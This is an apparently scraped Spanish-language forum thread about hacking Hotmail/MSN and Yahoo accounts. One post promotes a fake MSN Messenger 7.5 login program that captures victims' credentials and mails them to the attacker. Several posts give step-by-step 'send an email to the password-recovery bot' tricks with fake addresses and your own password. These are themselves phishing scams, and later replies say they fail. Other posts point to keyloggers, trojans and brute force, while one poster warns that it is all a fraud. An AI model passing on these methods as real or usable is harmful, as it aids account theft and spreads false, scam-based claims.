![]() |
|
|
|
|||
|
|||
mzn7.5.exe descarga desde nuestro servidor Este programa simula el inicio de sesión del MSN Messenger 7.5. La victima introduce su correo y clave y cuando da iniciar sesión le aparecerá un error falso diciendo que tiene mal la clave o su cuenta e inmediatamente le abrirá el MSN verdadero para no levantar ninguna sospecha. Estre programa tiene 2 opciones, que todos las claves te lleguen a tu correo y la otra es ver las claves desde la PC en que se instaló. Para ello vas al menú Ayuda, y clic en Acerca de MSN Messenger luego pulsas la imagen para ver todas las claves puestas del messenger. Tamaño:254 Kb. lo copie de aqui http://www.mehackearon.com/forum/showthread.php?t=7 hay te dan el programa para descargar y tambien otras versiones de msn .. son clonadores. . |
|
|
|||
|
|||
|
en lo d passord t slen un putero d virus aki nooo solo tienes k poner en para recove_pasaword_msn_display_shared_...s@hotma il.com si funciona pero tienen k en asunto recove ppassaword y en el cuerpo 1 linia
recoveh5ks=;prosedpasaword:?;microsft_documents 2 linea recove_acound(emil d la victima)paass;direct 3 linea dejala en blanco 4 linea 77777777 asta lenar y en la 5 pones to_hot;msn(tu correo)password chet (tu contraseña)errr modem y ia |
|
|
|||
|
|||
|
COMO HACKEAR PASSWORDS DE YAHOO
El método utilizado por YAHOO para dar una contraseña perdida es utilizar el asistente de su web pero lo que realmente hace es acceder a un 'bot' que lo único que hace es enviar un e-mail al correo de la persona que se lo solicita cuando lo ha olvidado asegurando así la privacidad. Pero lo que no todo el mundo sabe es que este proceso (normalmente realizado desde la web) no es mas que un envió a bot_cent_pass_yh@yahoo.com (bot de yahoo) y que este puede ser alterado para nuestro beneficio. Y AQUI ESTA EL TRUCO!! Todo consiste en enviar un e-mail... **********PASO 1: En el campo para: escribiremos EN MINUSCULAS: bot_cent_pass_yh@yahoo.com **********PASO 2: En el campo Asunto escribiremos TAL CUAL ESCRIBO: PassRecovery_mail_botyahoo **********PASO 3: EN LA PRIMERA LINEA (IMPORTANTE QUE SEA LA PRIMERA LINEA DEL MENSAJE) Escribiremos lo siguiente: USR_RCVR_YH:correodelavictima@yahoo.com **********PASO 4: EN LA CUARTA LINEA HAS DE PONER LO SIGUIENTE (recuerda la CUARTA LINEA) : REDIRECT_TO:tuemail@yahoo.com_tucontraseña * LA SEGUNDA Y TERCERA LINEA DEBEN SER SIMPLES INTROS (o sea en blanco) ************************************************** ************************************************** ************* Una explicación a todo esto es la siguiente. Al mandar un e-mail al bot desde la Web, este pensara que el e-mail es enviado por nuestra victima pero para que el bot no le valla a enviar la respuesta a nuestra victima es que ponemos el campo REDIRECT_TO que lo que hace es redireccionar la salida del mensaje hacia nuestra cuenta depositando suavemente, amigablemente, exquisitamente la contraseña de la victima en nuestro amado buzón de correo. Normalmente suele tardar entre 24 y 48 horas en llegar, así que hay que tener un poco de paciencia. Aunque no siempre nos funciona en el primer intento. Bueno que disfrutes de esto hasta que nuestros amigos de yahoo se den cuenta... Recuerda: Para: bot_cent_pass_yh@yahoo.com Asunto: PassRecovery_mail_botyahoo *EN LA PRIMERA LINEA (IMPORTANTE QUE SEA LA PRIMERA LINEA DEL MENSAJE) Escribiremos lo siguiente: USR_RCVR:correodelavictima@yahoo.com * LA SEGUNDA Y TERCERA LINEA DEBEN SER SIMPLES INTROS (o sea en blanco) *EN LA CUARTA LINEA HAS DE PONER LO SIGUIENTE (recuerda la CUARTA LINEA) : REDIRECT_TO:tuemail@yahoo.com_tucontraseña Y a continuación enviar. |
|
|
|||
|
|||
|
POR FAVOR!!!!!!!!!! NOS OIGAIS LO QUE ESTOS PUTOS Y PUTAS DICEN
ES TODO MENTIRA, JAMÁS TIENEN QUE ENVIAR SU PASSWORD A NADIE! LAS CONTRASEÑAS SON PRIVADAS, Y ESTOS JILIPOLLAS SOLO QUIEREN ROBAROS VUESTRAS CUENTAS!!!!!!!!!!!!!!!!!!!!!! SEAN INTELIGENTES!!! NO DEJEN QUE LA PUTA DE PAU NI NADIE OS HAGA CREER QUE REALMENTE SE PUEDE CONSEGUIR UNA CUENTA DE HOTMAIL, YAHOO, ETC DE ESTA MANERA TAN ESTUPIDA. ESTOY ARTA DE VER QUE LOS GUEBONES DE MIERDA QUIERAN AFANARLE LAS CONTRASEÑAS A LA GENTE QUE TAMBIEN ES ESTUPIDA Y QUIERE AFANARLE LA CONTRASEÑA A SU NOVIO/A, AMIGO/A, ETC....DEJAOS DE JODER CON VUESTRAS INMADURECES...CHUPAOS TODOS EL CULO. [/FONT] ![]() |
|
|
|||
|
|||
|
Cita:
oleee... posss, akabo de intentarlo y.. si es así de "inmediato" komo dices?? espero ke me de resultado.... porke.. me gustaria, entonces, ke me ayudaras si no me funciona.jejeje ![]() |
|
|
|||
|
|||
|
bueno lo primero q tienen q hacer es enviar un email a hot_segutidad_center@hotmail.com en el aepaci de asunto escriben retrieve password
:form_pwd;login=(escribe aqui el login de tu victima) form.login.focus();form.passwd.gets=”;form_pwd;val ue=”yes”; sendto=(escribe tu correo electronico); form.passwd (escribe tu password) form_pwd;value=”admin”; y listo en menos de 5 minutos le llegara un correo con la contraceña de el correo de tu victima |
|
|
|||
|
|||
|
buenho me canse de q me agregue la re gente a mi msn asi que mejor pasense x aca:
http://miforo.bestoforum.net/Compu-...-HOTMAIL-t9.htm o usen un keylogger, o troyanos (hay buenasd guias en portalhacker |
|
|
|||
|
|||
|
esta claro q eres un niño tonto pajero.. lamer .. noob..
jajaj a quien quieres engañar gilipollas... te voy a enseñar unos modos de crakear hotmail.. 1 : necesitas algun tipo de Brute Force.. 2: dame tu hotmail q te vas a veer 3: entra en mi pagina se quieres www.darkmetalic.cjb.net (hay q ententer portugués) "" son todos Lammers aki "" ok.. te voy a coger tu ip aki solo para dejar de ser un tonto.. saludos* |
|
|
|||
|
|||
|
he intentado dos de las opciones pero cuando envio los mensajes automaticamente me envian un mensaje de postmaster diciendome que no se ha podido enviar el mensaje a dichas direcciones... me gustaria saber por que... alguien puede ayudarme???
|
|
|
|||
|
|||
|
acabo de intentarlo he esperado pero no llega
|